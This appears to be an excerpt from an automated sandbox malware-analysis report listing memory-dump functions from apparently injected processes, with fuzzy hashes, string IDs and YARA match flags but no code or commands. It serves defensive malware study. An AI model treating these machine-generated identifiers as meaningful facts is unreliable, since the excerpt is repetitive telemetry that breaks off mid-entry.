                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 1995241f90720a0ae2bc2d4f866460776566c121a62a8813e2a5b69d7f36031e
                                  • Instruction ID: 9d45a09477d9a7ac63987cd035573116f0abdbf7163bd93d89d97b0d5b024fd5
                                  • Opcode Fuzzy Hash: 1995241f90720a0ae2bc2d4f866460776566c121a62a8813e2a5b69d7f36031e
                                  • Instruction Fuzzy Hash: B590023132580147D140715858586064085ABE1305F55D111F0419524CD915C99A5227
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 24882E30 Relevance: .0, Instructions: 4COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000011.00000002.3306549611.0000000024810000.00000040.00001000.00020000.00000000.sdmp, Offset: 24810000, based on PE: true
                                  • Associated: 00000011.00000002.3306549611.0000000024939000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000011.00000002.3306549611.000000002493D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000011.00000002.3306549611.00000000249AE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_17_2_24810000_wab.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: d581b6f6f967eea10f35e5d1aa5072997a0351716b1f12440f1752377b010f84
                                  • Instruction ID: f9e332197a1b833aea6383a9c991c8af8f8fcc55b9b58d9b29685f67aa11002e
                                  • Opcode Fuzzy Hash: d581b6f6f967eea10f35e5d1aa5072997a0351716b1f12440f1752377b010f84
                                  • Instruction Fuzzy Hash: B890023132580546D1027158485460600899BD1349F95C112F1429525D8625CA97A137
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 24882F30 Relevance: .0, Instructions: 4COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000011.00000002.3306549611.0000000024810000.00000040.00001000.00020000.00000000.sdmp, Offset: 24810000, based on PE: true
                                  • Associated: 00000011.00000002.3306549611.0000000024939000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000011.00000002.3306549611.000000002493D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000011.00000002.3306549611.00000000249AE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_17_2_24810000_wab.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 5acfe6d742c5cf8ebea35d51ac20eaaee166c926e04a7c9919b6650258622310
                                  • Instruction ID: 4dc5f19eed9e1165b1865a398f549f9e843e81c0be74ea7087afe0369c3f0423
                                  • Opcode Fuzzy Hash: 5acfe6d742c5cf8ebea35d51ac20eaaee166c926e04a7c9919b6650258622310
                                  • Instruction Fuzzy Hash: BE90027136580586D10071584854B0600859BE1305F55C115F1069524D8619CD96612B
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 24884340 Relevance: .0, Instructions: 4COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000011.00000002.3306549611.0000000024810000.00000040.00001000.00020000.00000000.sdmp, Offset: 24810000, based on PE: true
                                  • Associated: 00000011.00000002.3306549611.0000000024939000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000011.00000002.3306549611.000000002493D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000011.00000002.3306549611.00000000249AE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_17_2_24810000_wab.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 356d9a758772d34e59d54c94bbe9234b7b69b9e4be73d515909562b3a0e55903
                                  • Instruction ID: de23d59eb61698fb52ed97905ad7ba0f0f83403103d13b354bb6ced4506adf5a
                                  • Opcode Fuzzy Hash: 356d9a758772d34e59d54c94bbe9234b7b69b9e4be73d515909562b3a0e55903
                                  • Instruction Fuzzy Hash: E4900231629C0156914071584CC454640856BE0305B55C111F0429524C8A14CA9A5366
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 24884650 Relevance: .0, Instructions: 4COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000011.00000002.3306549611.0000000024810000.00000040.00001000.00020000.00000000.sdmp, Offset: 24810000, based on PE: true
                                  • Associated: 00000011.00000002.3306549611.0000000024939000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000011.00000002.3306549611.000000002493D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000011.00000002.3306549611.00000000249AE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_17_2_24810000_wab.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: c055743f9e55cc3e40b049968fda14b36e69384772778818ff22348c65b7f3ad
                                  • Instruction ID: f10826ad8ff1f0eb2d9898a960813672d875e4c4a51da3c4d95327bf96978c29
                                  • Opcode Fuzzy Hash: c055743f9e55cc3e40b049968fda14b36e69384772778818ff22348c65b7f3ad
                                  • Instruction Fuzzy Hash: 7C90027162590186414071584C4440660856BE1305395C215B0559530C8618C999926E
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 24882C60 Relevance: .0, Instructions: 4COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000011.00000002.3306549611.0000000024810000.00000040.00001000.00020000.00000000.sdmp, Offset: 24810000, based on PE: true
                                  • Associated: 00000011.00000002.3306549611.0000000024939000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000011.00000002.3306549611.000000002493D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000011.00000002.3306549611.00000000249AE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_17_2_24810000_wab.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 007bae6e2272d6fc90ca9cb5b13741cdb5ae6096fdebed7d7dee05321d27e473
                                  • Instruction ID: 22efde4b8d55a5d06f94607072ee5fd3b255c0d3e57349450c710028fc9f2f7e
                                  • Opcode Fuzzy Hash: 007bae6e2272d6fc90ca9cb5b13741cdb5ae6096fdebed7d7dee05321d27e473
                                  • Instruction Fuzzy Hash: F890023122580986D10071584844B4600855BE0305F55C116B0129624D8615C9957526
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 24882F60 Relevance: .0, Instructions: 4COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000011.00000002.3306549611.0000000024810000.00000040.00001000.00020000.00000000.sdmp, Offset: 24810000, based on PE: true
                                  • Associated: 00000011.00000002.3306549611.0000000024939000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000011.00000002.3306549611.000000002493D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000011.00000002.3306549611.00000000249AE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_17_2_24810000_wab.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: eb2f60da48400217a75dd7fc926b30aacff39c2c02e9e88555fafaabde8dd097
                                  • Instruction ID: 9f3236d3ea9bfeb68b17c0943d616c72152b3277fd54af7989d8dfdc623a25b7
                                  • Opcode Fuzzy Hash: eb2f60da48400217a75dd7fc926b30aacff39c2c02e9e88555fafaabde8dd097
                                  • Instruction Fuzzy Hash: EF90027123580186D1047158484470600C55BE1205F55C112B2159524CC529CDA5512A
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 24883D70 Relevance: .0, Instructions: 4COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000011.00000002.3306549611.0000000024810000.00000040.00001000.00020000.00000000.sdmp, Offset: 24810000, based on PE: true
                                  • Associated: 00000011.00000002.3306549611.0000000024939000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000011.00000002.3306549611.000000002493D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000011.00000002.3306549611.00000000249AE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_17_2_24810000_wab.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: b2e84f455367141aef58d80a65cdafdaa6541c01673aafa5cd79a961eb7b655c
                                  • Instruction ID: a7af6300bcce575d1f6b8c0e33c750b1dad418a17aa6d2116f55fd176f944a1c
                                  • Opcode Fuzzy Hash: b2e84f455367141aef58d80a65cdafdaa6541c01673aafa5cd79a961eb7b655c
                                  • Instruction Fuzzy Hash: A190023522580546D51071585C4464600C65BD0305F55D511B0429528D8654C9E5A126
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 24882C00 Relevance: .0, Instructions: 2COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000011.00000002.3306549611.0000000024810000.00000040.00001000.00020000.00000000.sdmp, Offset: 24810000, based on PE: true
                                  • Associated: 00000011.00000002.3306549611.0000000024939000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000011.00000002.3306549611.000000002493D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000011.00000002.3306549611.00000000249AE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_17_2_24810000_wab.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                                  • Instruction ID: d4b46cef935b88bd992d3e7d4f41a0e823e611759c8c877ecf14b43a5eefbde6
                                  • Opcode Fuzzy Hash: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                                  • Instruction Fuzzy Hash:
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Executed Functions

                                  Function 03A615DB Relevance: .1, Instructions: 107COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000015.00000002.3568923150.00000000038D0000.00000040.00000001.00040000.00000000.sdmp, Offset: 038D0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_21_2_38d0000_TsrCaEwNrfOKANGWcsg.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 004abda42623fe009a0109fe4f1bf2fc626823da7319d57f8dc079425733cf43
                                  • Instruction ID: 9aa61c2d15a6b4f7387b7bbed9ae7343865b6a10b79c07345c901b62425592f0
                                  • Opcode Fuzzy Hash: 004abda42623fe009a0109fe4f1bf2fc626823da7319d57f8dc079425733cf43
                                  • Instruction Fuzzy Hash: 3631A2116593F14ED30E836D08BDA75AFC28E5720174EC2EEDADA5F2F3C4888418D3A5
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 03A60BC8 Relevance: 35.5, Strings: 28, Instructions: 478COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000015.00000002.3568923150.00000000038D0000.00000040.00000001.00040000.00000000.sdmp, Offset: 038D0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_21_2_38d0000_TsrCaEwNrfOKANGWcsg.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID: !,$3C$7$72$>V$@)$EJ$G$JB$JW$Q8$R$RU$Ug$Z$[$^$a^$d$j$oB$pW$v$v|$yK$yk$|$>
                                  • API String ID: 0-1037518265
                                  • Opcode ID: fee4a81678f553104ae400da29571086c671368864d6998e99c821a8cd40617e
                                  • Instruction ID: ee9c211c83730504ee27b0b3ba42e5e7948d11d0bdf6d73692c8a172366cfdf7
                                  • Opcode Fuzzy Hash: fee4a81678f553104ae400da29571086c671368864d6998e99c821a8cd40617e
                                  • Instruction Fuzzy Hash: E3429DB0D05668CBEB64CF55C998BDDBBB1BB45308F1081DAD10EAB380CBB55A89CF45
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 03A6E458 Relevance: 6.4, Strings: 5, Instructions: 147COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000015.00000002.3568923150.00000000038D0000.00000040.00000001.00040000.00000000.sdmp, Offset: 038D0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_21_2_38d0000_TsrCaEwNrfOKANGWcsg.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID: 6$O$S$\$s
                                  • API String ID: 0-3854637164
                                  • Opcode ID: 0ab83c4dcd2d40bc8ab337713dfde0c2f3239245017de608984da415b1f3cff8
                                  • Instruction ID: ac2c78925b88ecc32ae1b4a7d1cca8ff91cd6b0afe51c29058efcb48b758cba9
                                  • Opcode Fuzzy Hash: 0ab83c4dcd2d40bc8ab337713dfde0c2f3239245017de608984da415b1f3cff8
                                  • Instruction Fuzzy Hash: AC41B9B6900219BBDB10EBD4DE48EEFB3BCEF44315F44419AE90C9B240E7759A588BD1
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 03A7ACF8 Relevance: 2.5, Strings: 2, Instructions: 46COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000015.00000002.3568923150.00000000038D0000.00000040.00000001.00040000.00000000.sdmp, Offset: 038D0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_21_2_38d0000_TsrCaEwNrfOKANGWcsg.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID: d3$zl
                                  • API String ID: 0-3869123564
                                  • Opcode ID: bdc8d2a458fa69aac5f58a0c840ffa0d16cd5d9fb378cc1fd95531b243ad7f76
                                  • Instruction ID: aa699d08b9b604bd5395a5a368554377aadfc513ebdb174101ed0fd63f356e35
                                  • Opcode Fuzzy Hash: bdc8d2a458fa69aac5f58a0c840ffa0d16cd5d9fb378cc1fd95531b243ad7f76
                                  • Instruction Fuzzy Hash: 7201D7B6D01219AF9B44DFE8D9419EEBBF9EB18200F14866EE815F6240E77456048FA1
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 03A7AD88 Relevance: 1.3, Strings: 1, Instructions: 62COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000015.00000002.3568923150.00000000038D0000.00000040.00000001.00040000.00000000.sdmp, Offset: 038D0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_21_2_38d0000_TsrCaEwNrfOKANGWcsg.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID: VL
                                  • API String ID: 0-3528648086
                                  • Opcode ID: 7a2aa897d3a56437b5ff982255c85591fc1d64c2ba49dd43489b6eaa07c06462
                                  • Instruction ID: 1a79df9a4831fd7f9d7b46df16dce44d87996c5e438d9b9fd7c2bca76f3a5ace
                                  • Opcode Fuzzy Hash: 7a2aa897d3a56437b5ff982255c85591fc1d64c2ba49dd43489b6eaa07c06462
                                  • Instruction Fuzzy Hash: 6A11DDB6D01219AF9B00DFA9DD409EEB7F8EB88210F04416BE919E7200E6705A54CBA5
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 03A7BFB8 Relevance: 1.3, Strings: 1, Instructions: 60COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000015.00000002.3568923150.00000000038D0000.00000040.00000001.00040000.00000000.sdmp, Offset: 038D0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_21_2_38d0000_TsrCaEwNrfOKANGWcsg.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID: GT
                                  • API String ID: 0-2464636624
                                  • Opcode ID: b16f8db12b5472ce7c130e8a01836ac44fb0dea1bc86374348120072ee0dadc6
                                  • Instruction ID: 6c6df44cbe49ecf3f28cb517294b7688c094d5a30094e57eb66defc3b3cd987f
                                  • Opcode Fuzzy Hash: b16f8db12b5472ce7c130e8a01836ac44fb0dea1bc86374348120072ee0dadc6
                                  • Instruction Fuzzy Hash: 56113DB6D0121CAF8B00DFE9DD419EEBBFCEF48210F04456BE918E7200E7705A048BA0
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 03A5A948 Relevance: .1, Instructions: 130COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000015.00000002.3568923150.00000000038D0000.00000040.00000001.00040000.00000000.sdmp, Offset: 038D0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_21_2_38d0000_TsrCaEwNrfOKANGWcsg.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 3fe8b851e3cde3abedc0a2bbee9df2ab34459f390cdd67a5e40f57d2a8ee1600
                                  • Instruction ID: ff1031175fae2e6fd63140b7614daa44c85a013f3acc6f3a7e937fcfa3bf011f
                                  • Opcode Fuzzy Hash: 3fe8b851e3cde3abedc0a2bbee9df2ab34459f390cdd67a5e40f57d2a8ee1600
                                  • Instruction Fuzzy Hash: 4F41EBB1D11229AFDB04CF99CC81AEEBBBCEF49710F10455BFA14E6240E7B09641CBA5
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 03A7E5C8 Relevance: .1, Instructions: 98COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000015.00000002.3568923150.00000000038D0000.00000040.00000001.00040000.00000000.sdmp, Offset: 038D0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_21_2_38d0000_TsrCaEwNrfOKANGWcsg.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: cf018d6c542dcef03741dd34ea96751def6e419a17db5e379fca68963f422c4a
                                  • Instruction ID: dc886fffd03c324deebcf4444e5ea80976e848e556edf98c34f5af02c64c970d
                                  • Opcode Fuzzy Hash: cf018d6c542dcef03741dd34ea96751def6e419a17db5e379fca68963f422c4a
                                  • Instruction Fuzzy Hash: 7C31C5B5A01608AFCB14DF98DC81EDEB7F9AF8C310F10821AF918A7340D770A951CBA0
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 03A7E108 Relevance: .1, Instructions: 94COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000015.00000002.3568923150.00000000038D0000.00000040.00000001.00040000.00000000.sdmp, Offset: 038D0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_21_2_38d0000_TsrCaEwNrfOKANGWcsg.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 98705bbcde889dfc5864be520fcae2e5fec0b1f9b867c2575197d7b9ddfd007a
                                  • Instruction ID: 7ce8e7e33665a834c4b0a02472bfdc0a46bd08d3fdb69cbed2eae5193272370b
                                  • Opcode Fuzzy Hash: 98705bbcde889dfc5864be520fcae2e5fec0b1f9b867c2575197d7b9ddfd007a
                                  • Instruction Fuzzy Hash: AE31D6B5A00608AFCB14DF98DC81EEEB7B9EF8C314F10811AFD18A7340D630A851CBA1
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 03A7E728 Relevance: .1, Instructions: 90COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000015.00000002.3568923150.00000000038D0000.00000040.00000001.00040000.00000000.sdmp, Offset: 038D0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_21_2_38d0000_TsrCaEwNrfOKANGWcsg.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 67128b11a4b4a6b84c578c6158015fa80bc9538983fac68061dd275e320b4ad3
                                  • Instruction ID: 0c403ae45ecde8590e49daf566c3ba2f2cd2587a99dca23045807117bb9dbbf4
                                  • Opcode Fuzzy Hash: 67128b11a4b4a6b84c578c6158015fa80bc9538983fac68061dd275e320b4ad3
                                  • Instruction Fuzzy Hash: A231CAB5A00608AFDB14DF59DC81EEEB7B9EF89714F10851AFD18A7340D770A851CBA1
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 03A7E028 Relevance: .1, Instructions: 82COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000015.00000002.3568923150.00000000038D0000.00000040.00000001.00040000.00000000.sdmp, Offset: 038D0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_21_2_38d0000_TsrCaEwNrfOKANGWcsg.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: a097ac1f8320be70295e11fb420ad66df62d03d5cabb00a8717b0ecf08a1261e
                                  • Instruction ID: e9c650905dceeb0842db6de591e781d0da10e43968ead964687517a7087f6bc0
                                  • Opcode Fuzzy Hash: a097ac1f8320be70295e11fb420ad66df62d03d5cabb00a8717b0ecf08a1261e
                                  • Instruction Fuzzy Hash: 8921E6B5A00209AFDB14DF98DC81EEFB7A9EF89300F10851AFD18A7340D774A811CBA5
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 03A6E298 Relevance: .1, Instructions: 75COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000015.00000002.3568923150.00000000038D0000.00000040.00000001.00040000.00000000.sdmp, Offset: 038D0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_21_2_38d0000_TsrCaEwNrfOKANGWcsg.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 9b78f1c0333149543c5f9bb64c44c7d20c36f6aa58bde0108a707f11f27a863d
                                  • Instruction ID: bcf9b81585da66bf5cd70d17d87b439974312afb4d6a33cb9678aa71635d9016
                                  • Opcode Fuzzy Hash: 9b78f1c0333149543c5f9bb64c44c7d20c36f6aa58bde0108a707f11f27a863d
                                  • Instruction Fuzzy Hash: 181173BA3803057BF760EB698D82FAB775C9F85B50F244016FB04AE2C1D6A4B81147B4
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 03A7E948 Relevance: .1, Instructions: 74COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000015.00000002.3568923150.00000000038D0000.00000040.00000001.00040000.00000000.sdmp, Offset: 038D0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_21_2_38d0000_TsrCaEwNrfOKANGWcsg.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: cf42b80be6e3dba02f96bfe041f2dad4d03f56fb21934c3e71a9284f62498637
                                  • Instruction ID: 505dc1a11fff08e5168b20d0492b9c26527548c0f57b9573818e282682306048
                                  • Opcode Fuzzy Hash: cf42b80be6e3dba02f96bfe041f2dad4d03f56fb21934c3e71a9284f62498637
                                  • Instruction Fuzzy Hash: 5C211AB5A00709ABDB14EF68CD81EDFB7A8EF89711F10850AFD18A7340D770A911CBA1
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 03A7B228 Relevance: .1, Instructions: 62COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000015.00000002.3568923150.00000000038D0000.00000040.00000001.00040000.00000000.sdmp, Offset: 038D0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_21_2_38d0000_TsrCaEwNrfOKANGWcsg.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 4b37fe83b0c93a478d46aa96b16d27f1ce70c5190108e7907ad3a4c9e7fdfd83
                                  • Instruction ID: 9eec0f08e1ddba8dbc6af6d173e707d1618fca559853f4283a308cb5a098450f
                                  • Opcode Fuzzy Hash: 4b37fe83b0c93a478d46aa96b16d27f1ce70c5190108e7907ad3a4c9e7fdfd83
                                  • Instruction Fuzzy Hash: A011DAB6D01218AF8B00DFA9D9419EEB7F8EF48210F04426EE915E7240E7705A048BA5
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 03A7DE48 Relevance: .1, Instructions: 62COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000015.00000002.3568923150.00000000038D0000.00000040.00000001.00040000.00000000.sdmp, Offset: 038D0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_21_2_38d0000_TsrCaEwNrfOKANGWcsg.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 5257543ee8ee48f006324fbf85ee87d49dad8922cf6dba73dd70e2d501c6b0f7
                                  • Instruction ID: 5220eed48316c59e47b92d9ed74f519875c8ff78845d6e650f7d49a87ad83f2e
                                  • Opcode Fuzzy Hash: 5257543ee8ee48f006324fbf85ee87d49dad8922cf6dba73dd70e2d501c6b0f7
                                  • Instruction Fuzzy Hash: FC119175A00744BBD710EBA8CC81FAFB7ACEF85611F00844AFD18AB380D77065018BA1
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 03A7DCE8 Relevance: .1, Instructions: 62COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000015.00000002.3568923150.00000000038D0000.00000040.00000001.00040000.00000000.sdmp, Offset: 038D0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_21_2_38d0000_TsrCaEwNrfOKANGWcsg.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: c966f7eda21cd299dfcdc3e67fb4226edd936e3cd9de164fe9e83c50e4b2269f
                                  • Instruction ID: b5a781245a2cf0ac1239d41a4a0a366d011b1b6d1b0aea5493f8b27fd925077a
                                  • Opcode Fuzzy Hash: c966f7eda21cd299dfcdc3e67fb4226edd936e3cd9de164fe9e83c50e4b2269f
                                  • Instruction Fuzzy Hash: 78111F75A41304BBD710EB68CC85FAFB7ACEF85611F10850AF918AB241D6746911CBA1
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 03A776B8 Relevance: .1, Instructions: 59COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000015.00000002.3568923150.00000000038D0000.00000040.00000001.00040000.00000000.sdmp, Offset: 038D0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_21_2_38d0000_TsrCaEwNrfOKANGWcsg.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 88cbd15f695642fb94690f900e013ef5515baded8b7fe0336e67b5ef3c3110b1
                                  • Instruction ID: 7102ed658026943db990e6f8cc0290ca1d674cbccaeacf80600270db2117652b
                                  • Opcode Fuzzy Hash: 88cbd15f695642fb94690f900e013ef5515baded8b7fe0336e67b5ef3c3110b1
                                  • Instruction Fuzzy Hash: BC0180BAA412187BEB50EBA4DC85DEF736CDF45210F000296FD189B241FA60AE558BE1
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 03A7B918 Relevance: .1, Instructions: 58COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000015.00000002.3568923150.00000000038D0000.00000040.00000001.00040000.00000000.sdmp, Offset: 038D0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_21_2_38d0000_TsrCaEwNrfOKANGWcsg.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 7b61a059fb82b233959326a990edfee467229a408cc37440877e42b5bbdf5e1b
                                  • Instruction ID: b4f2e2f6678951e00724cd1e68d113c1474d6492906ee9038df0138b4fa9f329
                                  • Opcode Fuzzy Hash: 7b61a059fb82b233959326a990edfee467229a408cc37440877e42b5bbdf5e1b
                                  • Instruction Fuzzy Hash: 64110AB6D01218AF8F40EFE9DD409EFBBF8EF48210F14416BE919E7200E7705A048BA1
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 03A5A93E Relevance: .1, Instructions: 51COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000015.00000002.3568923150.00000000038D0000.00000040.00000001.00040000.00000000.sdmp, Offset: 038D0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_21_2_38d0000_TsrCaEwNrfOKANGWcsg.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 9e234938dab2f88ddbf0930642fd828ab9ce6915c2eccc65d5c42a8178f04765
                                  • Instruction ID: 9bb1d5437f3960a979b6cacab189c2b19edba57e804b242a3af9cbe9fd99668d
                                  • Opcode Fuzzy Hash: 9e234938dab2f88ddbf0930642fd828ab9ce6915c2eccc65d5c42a8178f04765
